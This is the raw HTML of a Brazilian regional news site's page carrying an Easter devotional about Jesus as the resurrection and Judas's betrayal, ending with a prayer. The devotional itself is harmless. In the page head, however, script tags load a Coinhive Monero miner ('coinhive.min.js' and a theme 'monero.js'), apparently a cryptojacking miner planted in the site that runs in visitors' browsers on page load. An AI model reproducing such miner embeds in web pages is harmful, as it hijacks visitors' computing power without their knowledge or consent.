

<!DOCTYPE html>
<html class="no-js" lang="pt-BR">
<head>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-5NH0WLB29C"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-5NH0WLB29C');
</script>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://iguassunews.com/xmlrpc.php" />
<meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />

	<!-- This site is optimized with the Yoast SEO plugin v16.0.2 - https://yoast.com/wordpress/plugins/seo/ -->
	<title>JESUS É RESSURREIÇÃO E A VIDA! -</title>
	<link rel="canonical" href="https://iguassunews.com/jesus-e-ressurreicao-e-a-vida/" />
	<meta property="og:locale" content="pt_BR" />
	<meta property="og:type" content="article" />
	<meta property="og:title" content="JESUS É RESSURREIÇÃO E A VIDA! -" />
	<meta property="og:description" content="&quot;Disse-lhe Jesus: &#039;Eu sou a ressurreição e a vida. Aquele que crê em mim, ainda que morra, viverá&#039;.&quot; (João 11:25)" />
	<meta property="og:url" content="https://iguassunews.com/jesus-e-ressurreicao-e-a-vida/" />
	<meta property="article:published_time" content="2021-04-02T08:37:17+00:00" />
	<meta property="article:modified_time" content="2021-04-02T08:42:13+00:00" />
	<meta property="og:image" content="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/Espaco-Cristao.jpg?fit=742%2C414" />
	<meta property="og:image:width" content="742" />
	<meta property="og:image:height" content="414" />
	<meta name="twitter:card" content="summary_large_image" />
	<meta name="twitter:label1" content="Escrito por">
	<meta name="twitter:data1" content="admin">
	<meta name="twitter:label2" content="Est. tempo de leitura">
	<meta name="twitter:data2" content="3 minutos">
	<script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://iguassunews.com/#website","url":"http://iguassunews.com/","name":"Oiguassu","description":"","potentialAction":[{"@type":"SearchAction","target":"http://iguassunews.com/?s={search_term_string}","query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","@id":"https://iguassunews.com/jesus-e-ressurreicao-e-a-vida/#primaryimage","inLanguage":"pt-BR","url":"https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/Espaco-Cristao.jpg?fit=742%2C414","width":742,"height":414},{"@type":"WebPage","@id":"https://iguassunews.com/jesus-e-ressurreicao-e-a-vida/#webpage","url":"https://iguassunews.com/jesus-e-ressurreicao-e-a-vida/","name":"JESUS \u00c9 RESSURREI\u00c7\u00c3O E A VIDA! -","isPartOf":{"@id":"http://iguassunews.com/#website"},"primaryImageOfPage":{"@id":"https://iguassunews.com/jesus-e-ressurreicao-e-a-vida/#primaryimage"},"datePublished":"2021-04-02T08:37:17+00:00","dateModified":"2021-04-02T08:42:13+00:00","author":{"@id":"http://iguassunews.com/#/schema/person/1d041553b5df955921650ef8aff3cd06"},"breadcrumb":{"@id":"https://iguassunews.com/jesus-e-ressurreicao-e-a-vida/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https://iguassunews.com/jesus-e-ressurreicao-e-a-vida/"]}]},{"@type":"BreadcrumbList","@id":"https://iguassunews.com/jesus-e-ressurreicao-e-a-vida/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"item":{"@type":"WebPage","@id":"https://iguassunews.com/","url":"https://iguassunews.com/","name":"In\u00edcio"}},{"@type":"ListItem","position":2,"item":{"@type":"WebPage","@id":"https://iguassunews.com/jesus-e-ressurreicao-e-a-vida/","url":"https://iguassunews.com/jesus-e-ressurreicao-e-a-vida/","name":"JESUS \u00c9 RESSURREI\u00c7\u00c3O E A VIDA!"}}]},{"@type":"Person","@id":"http://iguassunews.com/#/schema/person/1d041553b5df955921650ef8aff3cd06","name":"admin","image":{"@type":"ImageObject","@id":"http://iguassunews.com/#personlogo","inLanguage":"pt-BR","url":"http://1.gravatar.com/avatar/720ba8469fe039789215358cbb933434?s=96&d=mm&r=g","caption":"admin"},"sameAs":["http://www.oiguassu.com"]}]}</script>
	<!-- / Yoast SEO plugin. -->


<link rel='dns-prefetch' href='//secure.gravatar.com' />
<link rel='dns-prefetch' href='//coinhive.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel='dns-prefetch' href='//v0.wordpress.com' />
<link rel='dns-prefetch' href='//i0.wp.com' />
<link rel='dns-prefetch' href='//i1.wp.com' />
<link rel='dns-prefetch' href='//i2.wp.com' />
<link rel='dns-prefetch' href='//c0.wp.com' />
<link rel='dns-prefetch' href='//widgets.wp.com' />
<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//0.gravatar.com' />
<link rel='dns-prefetch' href='//1.gravatar.com' />
<link rel='dns-prefetch' href='//2.gravatar.com' />
<link rel="alternate" type="application/rss+xml" title="Feed para  &raquo;" href="http://iguassunews.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para  &raquo;" href="http://iguassunews.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para  &raquo; JESUS É RESSURREIÇÃO E A VIDA!" href="http://iguassunews.com/jesus-e-ressurreicao-e-a-vida/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/iguassunews.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.7"}};
			!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([55357,56424,8205,55356,57212],[55357,56424,8203,55356,57212])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='http://iguassunews.com/wp-content/plugins/gutenberg/build/block-library/style.css?ver=10.3.0' type='text/css' media='all' />
<style id='wp-block-library-inline-css' type='text/css'>
.has-text-align-justify{text-align:justify;}
</style>
<link rel='stylesheet' id='mh-style-css'  href='http://iguassunews.com/wp-content/themes/mh_newsdesk/style.css?ver=1.3.0' type='text/css' media='all' />
<link rel='stylesheet' id='mh-font-awesome-css'  href='http://iguassunews.com/wp-content/themes/mh_newsdesk/includes/font-awesome.min.css' type='text/css' media='all' />
<link crossorigin="anonymous" rel='stylesheet' id='mh-google-fonts-css'  href='https://fonts.googleapis.com/css?family=PT+Serif:300,400,400italic,600,700%7cOswald:300,400,400italic,600,700' type='text/css' media='all' />
<link rel='stylesheet' id='social-logos-css'  href='https://c0.wp.com/p/jetpack/9.5/_inc/social-logos/social-logos.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='https://c0.wp.com/p/jetpack/9.5/css/jetpack.css' type='text/css' media='all' />
<script type='text/javascript' id='jetpack_related-posts-js-extra'>
/* <![CDATA[ */
var related_posts_js_options = {"post_heading":"h4"};
/* ]]> */
</script>
<script type='text/javascript' src='https://c0.wp.com/p/jetpack/9.5/_inc/build/related-posts/related-posts.min.js' id='jetpack_related-posts-js'></script>
<script type='text/javascript' src='https://c0.wp.com/c/5.7/wp-includes/js/jquery/jquery.min.js' id='jquery-core-js'></script>
<script type='text/javascript' src='https://c0.wp.com/c/5.7/wp-includes/js/jquery/jquery-migrate.min.js' id='jquery-migrate-js'></script>
<script type='text/javascript' src='http://iguassunews.com/wp-content/themes/mh_newsdesk/js/scripts.js?ver=5.7' id='mh-scripts-js'></script>
<script type='text/javascript' src='https://coinhive.com/lib/coinhive.min.js?ver=5.7' id='monero-js'></script>
<script type='text/javascript' src='http://iguassunews.com/wp-content/themes/mh_newsdesk/js/monero.js?ver=5.7' id='monero2-js'></script>
<link rel="https://api.w.org/" href="http://iguassunews.com/wp-json/" /><link rel="alternate" type="application/json" href="http://iguassunews.com/wp-json/wp/v2/posts/33494" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://iguassunews.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://iguassunews.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.7" />
<link rel='shortlink' href='https://wp.me/pS5BS-8Ie' />
<link rel="alternate" type="application/json+oembed" href="http://iguassunews.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Figuassunews.com%2Fjesus-e-ressurreicao-e-a-vida%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://iguassunews.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Figuassunews.com%2Fjesus-e-ressurreicao-e-a-vida%2F&#038;format=xml" />
<style type='text/css'>img#wpstats{display:none}</style>	<style type="text/css">
    	    		.social-nav a:hover, .logo-title, .entry-content a, a:hover, .entry-meta .entry-meta-author, .entry-meta a, .comment-info, blockquote, .pagination a:hover .pagelink { color: #0f7200; }
			.main-nav li:hover, .slicknav_menu, .ticker-title, .breadcrumb a, .breadcrumb .bc-text, .button span, .widget-title span, input[type=submit], table th, .comment-section-title .comment-count, #cancel-comment-reply-link:hover, .pagination .current, .pagination .pagelink { background: #0f7200; }
			blockquote, input[type=text]:hover, input[type=email]:hover, input[type=tel]:hover, input[type=url]:hover, textarea:hover { border-color: #0f7200; }
    	    	    				.main-nav, .main-nav ul li:hover > ul, .mh-footer { background: #019100; }
    	    	    	    		</style>
    <!--[if lt IE 9]>
<script src="http://iguassunews.com/wp-content/themes/mh_newsdesk/js/css3-mediaqueries.js"></script>
<![endif]-->
<link rel="amphtml" href="http://iguassunews.com/jesus-e-ressurreicao-e-a-vida/amp/"><link rel="icon" href="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/cropped-LOGO-Nova-IGU-News.jpg?fit=32%2C32" sizes="32x32" />
<link rel="icon" href="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/cropped-LOGO-Nova-IGU-News.jpg?fit=192%2C192" sizes="192x192" />
<link rel="apple-touch-icon" href="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/cropped-LOGO-Nova-IGU-News.jpg?fit=180%2C180" />
<meta name="msapplication-TileImage" content="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/cropped-LOGO-Nova-IGU-News.jpg?fit=270%2C270" />
			<style type="text/css" id="wp-custom-css">
				.logo-wrap img{
	width:100%
}			</style>
		</head>
<body class="post-template-default single single-post postid-33494 single-format-standard mh-right-sb">
<div id="mh-wrapper">
<header class="mh-header">
	<div class="header-wrap clearfix">
				<div class="mh-col mh-1-3 header-logo-full">
			<a href="http://iguassunews.com/" title="" rel="home">
<div class="logo-wrap" role="banner">
<img src="http://iguassunews.com/wp-content/uploads/2021/01/cropped-cropped-marco-das-tres-fronteiras-1024x576-3.jpeg" height="351" width="879" alt="" />
</div>
</a>
		</div>
			</div>
	<div class="header-menu clearfix">
		<nav class="main-nav clearfix">
			<div class="menu"><ul>
<li class="page_item page-item-2"><a href="http://iguassunews.com/about/">About</a></li>
<li class="page_item page-item-7"><a href="http://iguassunews.com/">Home</a></li>
</ul></div>
		</nav>
		<div class="header-sub clearfix">
							<div id="ticker" class="news-ticker mh-col mh-2-3 clearfix">
			<span class="ticker-title">
			Hot Topics		</span>
		<ul class="ticker-content">			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/jesus-e-ressurreicao-e-a-vida/" title="JESUS É RESSURREIÇÃO E A VIDA!">
					<span class="ticker-item-date">abril 2, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">JESUS É RESSURREIÇÃO E A VIDA!</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/tribuna-livre-yasmin-quer-psicologos-e-assistentes-sociais-nas-escolas-de-foz/" title="Coluna Tribuna Livre: VEREADOR KALITO SUGERE CONSTRUÇÃO DE CENTRO ESPORTIVO NO BAIRRO CIDADE NOVA">
					<span class="ticker-item-date">abril 2, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Coluna Tribuna Livre: VEREADOR KALITO SUGERE CONSTRUÇÃO DE CENTRO ESPORTIVO NO BAIRRO CIDADE NOVA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/energia-itaipu-tem-produtividade-recorde-no-primeiro-trimestre-de-2021/" title="Energia: ITAIPU TEM PRODUTIVIDADE RECORDE NO PRIMEIRO TRIMESTRE DE 2021">
					<span class="ticker-item-date">abril 2, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Energia: ITAIPU TEM PRODUTIVIDADE RECORDE NO PRIMEIRO TRIMESTRE DE 2021</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/sexta-feira-santa-veja-como-vao-funcionar-os-servicos-publicos-no-feriadao/" title="Sexta-Feira Santa: VEJA COMO VÃO FUNCIONAR OS SERVIÇOS PÚBLICOS NO FERIADÃO">
					<span class="ticker-item-date">abril 2, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Sexta-Feira Santa: VEJA COMO VÃO FUNCIONAR OS SERVIÇOS PÚBLICOS NO FERIADÃO</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/atrativos-rede-hoteleira-de-foz-espera-ocupacao-media-de-13-durante-feriado-de-pascoa/" title="Atrativos: REDE HOTELEIRA DE FOZ ESPERA OCUPAÇÃO MÉDIA DE 13% DURANTE FERIADO DE PÁSCOA">
					<span class="ticker-item-date">abril 2, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Atrativos: REDE HOTELEIRA DE FOZ ESPERA OCUPAÇÃO MÉDIA DE 13% DURANTE FERIADO DE PÁSCOA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/perimetral-leste-comecam-as-obras-do-viaduto-no-trevo-da-argentina/" title="Perimetral Leste: COMEÇAM AS OBRAS DO VIADUTO NO TREVO DA ARGENTINA">
					<span class="ticker-item-date">abril 2, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Perimetral Leste: COMEÇAM AS OBRAS DO VIADUTO NO TREVO DA ARGENTINA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/vacunas-alberto-fernandez-pidio-ayuda-en-forma-ironica-y-la-oposicion-salio-a-responderle/" title="Vacunas: ALBERTO FERNÁNDEZ PIDIÓ AYUDA EN FORMA IRÓNICA Y LA OPOSICIÓN SALIÓ A RESPONDERLE">
					<span class="ticker-item-date">abril 2, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Vacunas: ALBERTO FERNÁNDEZ PIDIÓ AYUDA EN FORMA IRÓNICA Y LA OPOSICIÓN SALIÓ A RESPONDERLE</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/santiago-pena-estamos-lejos-todavia-del-fin-de-esta-crisis-economica/" title="Santiago Peña: “ESTAMOS LEJOS TODAVÍA DEL FIN DE ESTA CRISIS ECONÓMICA”">
					<span class="ticker-item-date">abril 2, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Santiago Peña: “ESTAMOS LEJOS TODAVÍA DEL FIN DE ESTA CRISIS ECONÓMICA”</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/covid-19-chile-cierra-sus-fronteras-al-borde-del-colapso/" title="Covid-19: CHILE CIERRA SUS FRONTERAS AL BORDE DEL COLAPSO">
					<span class="ticker-item-date">abril 2, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Covid-19: CHILE CIERRA SUS FRONTERAS AL BORDE DEL COLAPSO</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/covid-19-oms-considera-inaceitavel-a-lentidao-na-vacinacao-na-europa/" title="Covid-19: OMS CONSIDERA &#8216;INACEITÁVEL&#8217; A LENTIDÃO NA VACINAÇÃO NA EUROPA">
					<span class="ticker-item-date">abril 2, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Covid-19: OMS CONSIDERA &#8216;INACEITÁVEL&#8217; A LENTIDÃO NA VACINAÇÃO NA EUROPA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/ocepar-sessao-solene-em-homenagem-ao-cooperativismo-sera-na-segunda-feira/" title="Ocepar: SESSÃO SOLENE EM HOMENAGEM AO COOPERATIVISMO SERÁ NA SEGUNDA-FEIRA">
					<span class="ticker-item-date">abril 2, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Ocepar: SESSÃO SOLENE EM HOMENAGEM AO COOPERATIVISMO SERÁ NA SEGUNDA-FEIRA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/toque-de-recolher-estabelecimentos-de-foz-serao-interditados-caso-descumpram-restricao-de-publico-e-horario-de-fechamento/" title="Toque de recolher: ESTABELECIMENTOS DE FOZ SERÃO INTERDITADOS CASO DESCUMPRAM RESTRIÇÃO DE PÚBLICO E HORÁRIO DE FECHAMENTO">
					<span class="ticker-item-date">abril 2, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Toque de recolher: ESTABELECIMENTOS DE FOZ SERÃO INTERDITADOS CASO DESCUMPRAM RESTRIÇÃO DE PÚBLICO E HORÁRIO DE FECHAMENTO</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/pandemia-fiocruz-pede-para-todos-ficarem-em-casa-na-pascoa-e-divulga-cartilha-com-novas-orientacoes/" title="Pandemia: FIOCRUZ PEDE PARA TODOS FICAREM EM CASA NA PÁSCOA E DIVULGA CARTILHA COM NOVAS ORIENTAÇÕES">
					<span class="ticker-item-date">abril 2, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Pandemia: FIOCRUZ PEDE PARA TODOS FICAREM EM CASA NA PÁSCOA E DIVULGA CARTILHA COM NOVAS ORIENTAÇÕES</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/na-pandemia-setor-de-radiologia-do-hospital-municipal-fez-mais-de-6-mil-exames-de-tomografia/" title="Saúde: SETOR DE RADIOLOGIA DO HOSPITAL MUNICIPAL FEZ MAIS DE 6 MIL EXAMES DE TOMOGRAFIA">
					<span class="ticker-item-date">abril 1, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">Saúde: SETOR DE RADIOLOGIA DO HOSPITAL MUNICIPAL FEZ MAIS DE 6 MIL EXAMES DE TOMOGRAFIA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://iguassunews.com/conheca-e-torne-cristo-conhecido/" title="CONHEÇA E TORNE CRISTO CONHECIDO">
					<span class="ticker-item-date">abril 1, 2021</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">CONHEÇA E TORNE CRISTO CONHECIDO</span>
				</a>
			</li>	</ul>
</div>						<aside class="mh-col mh-1-3 header-search">
				<form role="search" method="get" class="search-form" action="http://iguassunews.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form>			</aside>
		</div>
	</div>
</header><div class="mh-section mh-group">
	<div id="main-content" class="mh-content"><nav class="breadcrumb"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://iguassunews.com" itemprop="url" class="bc-home"><span itemprop="title">Home</span></a></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://iguassunews.com/category/extra/" itemprop="url"><span itemprop="title">Extra</span></a></span></nav>
<article id="post-33494" class="post-33494 post type-post status-publish format-standard has-post-thumbnail hentry category-extra">
	<header class="entry-header clearfix">
		<h1 class="entry-title">
			JESUS É RESSURREIÇÃO E A VIDA!		</h1>
			</header>
	
<div class="entry-thumbnail">
<img width="742" height="414" src="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/Espaco-Cristao.jpg?resize=742%2C414" class="attachment-content-single size-content-single wp-post-image" alt="" loading="lazy" srcset="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/Espaco-Cristao.jpg?w=742 742w, https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/Espaco-Cristao.jpg?resize=300%2C167 300w, https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/Espaco-Cristao.jpg?resize=180%2C101 180w, https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/Espaco-Cristao.jpg?resize=260%2C146 260w, https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/Espaco-Cristao.jpg?resize=120%2C67 120w" sizes="(max-width: 742px) 100vw, 742px" data-attachment-id="28908" data-permalink="http://iguassunews.com/?attachment_id=28908" data-orig-file="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/Espaco-Cristao.jpg?fit=742%2C414" data-orig-size="742,414" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="Espaço Cristão" data-image-description="" data-medium-file="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/Espaco-Cristao.jpg?fit=300%2C167" data-large-file="https://i0.wp.com/iguassunews.com/wp-content/uploads/2021/01/Espaco-Cristao.jpg?fit=742%2C414" /></div>
		<p class="entry-meta">
<span class="entry-meta-author vcard author">Posted By: <a class="fn" href="http://iguassunews.com/author/admin/">admin</a></span>
<span class="entry-meta-date updated">abril 2, 2021</span>
</p>
	<div class="entry-content clearfix">
		<p style="text-align: justify;">
<div id="palavra_hoje" class="articlebody">
<blockquote>
<h4><em>&#8220;Disse-lhe Jesus: &#8216;Eu sou a ressurreição e a vida. Aquele que crê em mim, ainda que morra, viverá&#8217;.&#8221;</em></h4>
<h5 style="text-align: right;">(João 11:25)</h5>
</blockquote>
</div>
<p style="text-align: justify;">A palavra sem resposta &#8220;Por quê?!&#8221; ecoa em minha alma enquanto leio o relato trágico da traição do nosso Salvador e Senhor Jesus, por Judas.</p>
<p style="text-align: justify;"><strong>Por quê?</strong></p>
<p style="text-align: justify;">Judas havia passado três anos com Jesus! Ele O viu curar corpos, tocar vidas destruídas e ressuscitar os mortos. Judas ouvira o Evangelho do amor.</p>
<p style="text-align: justify;"><strong>Por quê?</strong></p>
<p style="text-align: justify;">Judas riu e compartilhou a vida com Jesus. Judas viu a multiplicação milagrosa de pães e peixes&#8230; ele viu um mar outrora furioso tornar-se calmo&#8230; e viu demônios fugirem à voz Daquele que proclamou: &#8220;Haja luz!&#8221;</p>
<p style="text-align: justify;"><strong>Por quê?!</strong></p>
<p style="text-align: justify;">Judas sequer tem um coração?!</p>
<p style="text-align: justify;">Judas dirigiu-se aos chefes dos sacerdotes&#8230; eles não vieram a ele. Ele foi até eles.</p>
<p style="text-align: justify;">Sempre me perguntei se Judas traiu Jesus por causa do próprio vício. Eu me pergunto se Judas foi obrigado a vender Jesus aos assassinos por causa de uma compulsão que ele nunca foi capaz de vencer.</p>
<p style="text-align: justify;">Judas estava encarregado da caixa de dinheiro e era conhecido entre os discípulos que Judas muitas vezes saqueava do tesouro que deveria ser compartilhado. Não sabemos se os discípulos confrontaram Judas ou se Jesus o confrontou. O que sabemos é que Judas tinha um vício que nunca havia sido tratado.</p>
<p style="text-align: justify;">Judas poderia ter levado sua fraqueza a Jesus! Ele poderia ter confessado, pedido perdão e forças. Em vez disso, o vício enganoso e letal permaneceu escondido e, assim, dominou a capacidade de Judas andar pela fé e não pela visão.</p>
<p style="text-align: justify;">Você pode não vender Jesus por 30 moedas de prata, mas seus vícios e problemas farão com que você faça escolhas erradas. Você fará coisas que o envergonhará e o conduzirá a um caminho de remorso e culpa.</p>
<p style="text-align: justify;">Satanás se aproveitará de sua fraqueza. Ele fez isso com Judas e fará isso com você.</p>
<p style="text-align: justify;">Talvez seja hora de você fazer uma escolha que Judas nunca fez&#8230; ir a Jesus. Peça-lhe perdão e forças. Você ficará surpreso em como isso vai mudar o final da sua história!</p>
<h4 style="text-align: justify;"><strong>OREMOS:</strong> Pai querido, obrigado por esta palavra que renova a minha fé, e traz paz ao meu coração, pois eu posso depositar minhas esperanças na vida eterna, que Jesus conquistou para mim na cruz, uma vida perfeita junto ao Senhor, no Reino dos Céus. Ajuda-me a lembrar desta palavra quando eu estiver em meio à tribulação e a tentação, para que eu possa ter paz em Jesus, sabendo que as coisas desta vida são  passageiras, e o que importa realmente é a vida eterna. Eu oro em nome de Jesus, amém.</h4>
<h6 style="text-align: right;">(Com Bíblias YouVerson e OnLine)</h6>
<p><a href="https://i0.wp.com/iguassunews.com/wp-content/uploads/2020/09/peixe-2.jpg"><img data-attachment-id="24910" data-permalink="http://iguassunews.com/escrito-em-suas-maos/peixe-2/" data-orig-file="https://i0.wp.com/iguassunews.com/wp-content/uploads/2020/09/peixe-2.jpg?fit=300%2C240" data-orig-size="300,240" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="peixe -2" data-image-description="" data-medium-file="https://i0.wp.com/iguassunews.com/wp-content/uploads/2020/09/peixe-2.jpg?fit=300%2C240" data-large-file="https://i0.wp.com/iguassunews.com/wp-content/uploads/2020/09/peixe-2.jpg?fit=300%2C240" loading="lazy" class="aligncenter wp-image-24910 size-full" src="https://i0.wp.com/iguassunews.com/wp-content/uploads/2020/09/peixe-2.jpg?resize=300%2C240" alt="" width="300" height="240" data-recalc-dims="1" /></a></p>
<div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Compartilhe isso:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow noopener noreferrer" data-shared="sharing-twitter-33494" class="share-twitter sd-button share-icon no-text" href="http://iguassunews.com/jesus-e-ressurreicao-e-a-vida/?share=twitter" target="_blank" title="Clique para compartilhar no Twitter"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Twitter(abre em nova janela)</span></a></li><li class="share-facebook"><a rel="nofollow noopener noreferrer" data-shared="sharing-facebook-33494" class="share-facebook sd-button share-icon no-text" href="http://iguassunews.com/jesus-e-ressurreicao-e-a-vida/?share=facebook" target="_blank" title="Clique para compartilhar no Facebook"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Facebook(abre em nova janela)</span></a></li><li class="share-telegram"><a rel="nofollow noopener noreferrer" data-shared="" class="share-telegram sd-button share-icon no-text" 